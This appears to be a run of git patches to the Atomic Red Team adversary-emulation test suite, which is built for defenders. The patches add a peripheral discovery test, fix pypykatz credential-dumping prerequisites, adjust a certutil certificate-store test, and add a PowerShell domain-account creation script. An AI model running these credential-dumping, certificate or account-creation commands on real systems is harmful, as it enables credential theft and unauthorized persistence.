@@ -1112,7 +1112,8 @@ - Atomic Test #5: Examine local password policy - Windows [windows] - Atomic Test #6: Examine domain password policy - Windows [windows] - Atomic Test #7: Examine password policy - macOS [macos] -- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1120 Peripheral Device Discovery](../../T1120/T1120.md) + - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows] - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #1: Process Discovery - ps [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 093a7787..e790f09c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -822,7 +822,8 @@ - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #5: Examine local password policy - Windows [windows] - Atomic Test #6: Examine domain password policy - Windows [windows] -- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1120 Peripheral Device Discovery](../../T1120/T1120.md) + - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows] - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - Atomic Test #2: Process Discovery - tasklist [windows] diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index e0e95bab..8e8dc254 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -20,7 +20,7 @@ | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | [Process Discovery](../../T1057/T1057.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Keychain](../../T1555.001/T1555.001.md) | [Query Registry](../../T1012/T1012.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index 7eec7b6f..5b0f1086 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md @@ -15,7 +15,7 @@ | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Change Default File Association](../../T1546.001/T1546.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Process Discovery](../../T1057/T1057.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Execution](../../T1569.002/T1569.002.md) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 29023d04..0e807c14 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -47011,7 +47011,20 @@ discovery: - Process monitoring - Process command-line parameters x_mitre_is_subtechnique: false - atomic_tests: [] + identifier: T1120 + atomic_tests: + - name: Win32_PnPEntity Hardware Inventory + auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + description: Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + supported_platforms: + - windows + executor: + command: |- + Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt + $Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt + @($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt + cleanup_command: Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore + name: powershell T1069: technique: id: attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md new file mode 100644 index 00000000..4a4a879a --- /dev/null +++ b/atomics/T1120/T1120.md @@ -0,0 +1,39 @@ +# T1120 - Peripheral Device Discovery +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1120) +
Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
+ +## Atomic Tests + +- [Atomic Test #1 - Win32_PnPEntity Hardware Inventory](#atomic-test-1---win32_pnpentity-hardware-inventory) + + +
+ +## Atomic Test #1 - Win32_PnPEntity Hardware Inventory +Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt +$Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt +@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt +``` + +#### Cleanup Commands: +```powershell +Remove-Item $env:TEMP\T1120_collection.txt -ErrorAction Ignore +``` + + + + + +
From 81f2b097b5406779bac9c90ef54a722109c68b1e Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Thu, 11 Feb 2021 09:59:22 -0600 Subject: [PATCH 110/131] prereq fixes (#1388) prereq fixes Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 13 ++++++++----- atomics/T1003.002/T1003.002.yaml | 13 ++++++++----- 2 files changed, 16 insertions(+), 10 deletions(-) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index e514e80b..80856999 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -215,26 +215,29 @@ atomic_tests: Successful execution of this test will display multiple useranames and passwords/hashes to the screen. supported_platforms: - windows - dependency_executor_name: powershell + dependency_executor_name: command_prompt dependencies: - description: | Computer must have python 3 installed prereq_command: | - if (python --version) {exit 0} else {exit 1} + py -3 --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | echo "Python 3 must be installed manually" - description: | Computer must have pip installed prereq_command: | - if (pip3 -V) {exit 0} else {exit 1} + py -3 -m pip --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | echo "PIP must be installed manually" - description: | pypykatz must be installed and part of PATH prereq_command: | - if (cmd /c pypykatz -h) {exit 0} else {exit 1} + pypykatz -h >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | - pip3 install pypykatz + pip install pypykatz executor: command: | pypykatz live lsa diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 45fdcac7..081107a1 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -28,26 +28,29 @@ atomic_tests: Parses registry hives to obtain stored credentials supported_platforms: - windows - dependency_executor_name: powershell + dependency_executor_name: command_prompt dependencies: - description: | Computer must have python 3 installed prereq_command: | - if (python --version) {exit 0} else {exit 1} + py -3 --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | echo "Python 3 must be installed manually" - description: | Computer must have pip installed prereq_command: | - if (pip3 -V) {exit 0} else {exit 1} + py -3 -m pip --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | echo "PIP must be installed manually" - description: | pypykatz must be installed and part of PATH prereq_command: | - if (cmd /c pypykatz -h) {exit 0} else {exit 1} + pypykatz -h >nul 2>&1 + exit /b %errorlevel% get_prereq_command: | - pip3 install pypykatz + pip install pypykatz executor: command: | pypykatz live registry From 73bdd9c307ff0ef244ca80322b1a518134eb6e56 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 15:59:48 +0000 Subject: [PATCH 111/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 44 +++++++++++++++++----------------- atomics/T1003.001/T1003.001.md | 25 ++++++++++--------- atomics/T1003.002/T1003.002.md | 25 ++++++++++--------- 3 files changed, 50 insertions(+), 44 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0e807c14..b6bdb550 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20466,33 +20466,33 @@ credential-access: Successful execution of this test will display multiple useranames and passwords/hashes to the screen. supported_platforms: - windows - dependency_executor_name: powershell + dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} - -' + prereq_command: | + py -3 --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" ' - description: 'Computer must have pip installed ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - -' + prereq_command: | + py -3 -m pip --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" ' - description: 'pypykatz must be installed and part of PATH ' - prereq_command: 'if (cmd /c pypykatz -h) {exit 0} else {exit 1} - -' - get_prereq_command: 'pip3 install pypykatz + prereq_command: | + pypykatz -h >nul 2>&1 + exit /b %errorlevel% + get_prereq_command: 'pip install pypykatz ' executor: @@ -22268,33 +22268,33 @@ credential-access: ' supported_platforms: - windows - dependency_executor_name: powershell + dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} - -' + prereq_command: | + py -3 --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" ' - description: 'Computer must have pip installed ' - prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} - -' + prereq_command: | + py -3 -m pip --version >nul 2>&1 + exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" ' - description: 'pypykatz must be installed and part of PATH ' - prereq_command: 'if (cmd /c pypykatz -h) {exit 0} else {exit 1} - -' - get_prereq_command: 'pip3 install pypykatz + prereq_command: | + pypykatz -h >nul 2>&1 + exit /b %errorlevel% + get_prereq_command: 'pip install pypykatz ' executor: diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index e90f33b9..800e5f0c 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -358,33 +358,36 @@ pypykatz live lsa -#### Dependencies: Run with `powershell`! +#### Dependencies: Run with `command_prompt`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```powershell -if (python --version) {exit 0} else {exit 1} +```cmd +py -3 --version >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell +```cmd echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -```powershell -if (pip3 -V) {exit 0} else {exit 1} +```cmd +py -3 -m pip --version >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell +```cmd echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -```powershell -if (cmd /c pypykatz -h) {exit 0} else {exit 1} +```cmd +pypykatz -h >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell -pip3 install pypykatz +```cmd +pip install pypykatz ``` diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 728eef9d..d2b817bc 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -89,33 +89,36 @@ pypykatz live registry -#### Dependencies: Run with `powershell`! +#### Dependencies: Run with `command_prompt`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```powershell -if (python --version) {exit 0} else {exit 1} +```cmd +py -3 --version >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell +```cmd echo "Python 3 must be installed manually" ``` ##### Description: Computer must have pip installed ##### Check Prereq Commands: -```powershell -if (pip3 -V) {exit 0} else {exit 1} +```cmd +py -3 -m pip --version >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell +```cmd echo "PIP must be installed manually" ``` ##### Description: pypykatz must be installed and part of PATH ##### Check Prereq Commands: -```powershell -if (cmd /c pypykatz -h) {exit 0} else {exit 1} +```cmd +pypykatz -h >nul 2>&1 +exit /b %errorlevel% ``` ##### Get Prereq Commands: -```powershell -pip3 install pypykatz +```cmd +pip install pypykatz ``` From 6f91baab5c4ceed6a753bb9a209dc366b45c76c2 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Thu, 11 Feb 2021 09:16:41 -0700 Subject: [PATCH 112/131] Update T1553.004.yaml (#1386) Fixed test as it was not working Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> Co-authored-by: Carrie Roberts --- atomics/T1553.004/T1553.004.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index dfd84553..d3663bc7 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -147,7 +147,7 @@ atomic_tests: Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item executor: command: | - certutil -addstore my .\test-cert.cer + certutil -addstore my #{pfx_path} cleanup_command: | $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore From ac3c47befe8698e009b81e6124258a9f6e9ecd71 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 11 Feb 2021 16:17:23 +0000 Subject: [PATCH 113/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1553.004/T1553.004.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b6bdb550..e79f7cb0 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -32355,7 +32355,7 @@ defense-evasion: Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path} Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item executor: - command: 'certutil -addstore my .\test-cert.cer + command: 'certutil -addstore my #{pfx_path} ' cleanup_command: | diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 5ecf6f2a..43e59df9 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -224,7 +224,7 @@ Creates a root CA with certutil ```powershell -certutil -addstore my .\test-cert.cer +certutil -addstore my #{pfx_path} ``` #### Cleanup Commands: From fc3a267c824145afb93c4d4aee523a32a2a82978 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Thu, 11 Feb 2021 09:45:37 -0700 Subject: [PATCH 114/131] Bump nokogiri from 1.10.10 to 1.11.1 (#1389) Bumps [nokogiri](https://github.com/sparklemotion/nokogiri) from 1.10.10 to 1.11.1. - [Release notes](https://github.com/sparklemotion/nokogiri/releases) - [Changelog](https://github.com/sparklemotion/nokogiri/blob/main/CHANGELOG.md) - [Commits](https://github.com/sparklemotion/nokogiri/compare/v1.10.10...v1.11.1) Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Carrie Roberts --- Gemfile.lock | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 513d82b8..d75c20af 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -208,21 +208,23 @@ GEM rb-fsevent (~> 0.10, >= 0.10.3) rb-inotify (~> 0.9, >= 0.9.10) mercenary (0.3.6) - mini_portile2 (2.4.0) + mini_portile2 (2.5.0) minima (2.5.1) jekyll (>= 3.5, < 5.0) jekyll-feed (~> 0.9) jekyll-seo-tag (~> 2.1) minitest (5.14.2) multipart-post (2.1.1) - nokogiri (1.10.10) - mini_portile2 (~> 2.4.0) + nokogiri (1.11.1) + mini_portile2 (~> 2.5.0) + racc (~> 1.4) octokit (4.19.0) faraday (>= 0.9) sawyer (~> 0.8.0, >= 0.5.3) pathutil (0.16.2) forwardable-extended (~> 2.6) public_suffix (3.1.1) + racc (1.5.2) rb-fsevent (0.10.4) rb-inotify (0.10.1) ffi (~> 1.0) From 57b1728731ab8b3fb5c8d02545fe48dcc8bc48df Mon Sep 17 00:00:00 2001 From: Jonhnathan Date: Thu, 11 Feb 2021 14:18:38 -0300 Subject: [PATCH 115/131] Update T1136.002.yaml (#1384) * Update T1136.002.yaml * Adds default values, remove guid * remove auto_generated_guid line Co-authored-by: Carrie Roberts --- atomics/T1136.002/T1136.002.yaml | 33 ++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) diff --git a/atomics/T1136.002/T1136.002.yaml b/atomics/T1136.002/T1136.002.yaml index 39ed1c3f..b8a9a7a3 100644 --- a/atomics/T1136.002/T1136.002.yaml +++ b/atomics/T1136.002/T1136.002.yaml @@ -50,3 +50,36 @@ atomic_tests: net user "#{username}" >nul 2>&1 /del /domain name: command_prompt elevation_required: false # Requires a user to be a Domain Admin! +- name: Create a new Domain Account using PowerShell + description: | + Creates a new Domain User using the credentials of the Current User + supported_platforms: + - windows + input_arguments: + username: + description: "Name of the Account to be created" + type: String + default: T1136.002_Admin + password: + description: "Password of the Account to be created" + type: String + default: T1136_pass123! + executor: + command: | + $SamAccountName = '#{username}' + $AccountPassword = ConvertTo-SecureString '#{password}' -AsPlainText -Force + Add-Type -AssemblyName System.DirectoryServices.AccountManagement + $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain) + $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList ($Context) + $User.SamAccountName = $SamAccountName + $TempCred = New-Object System.Management.Automation.PSCredential('a', $AccountPassword) + $User.SetPassword($TempCred.GetNetworkCredential().Password) + $User.Enabled = $True + $User.PasswordNotRequired = $False + $User.DisplayName = $SamAccountName + $User.Save() + $User + cleanup_command: | + net user "#{username}" >nul 2>&1 /del /domain + name: powershell + elevation_required: false # Requires a user to be a 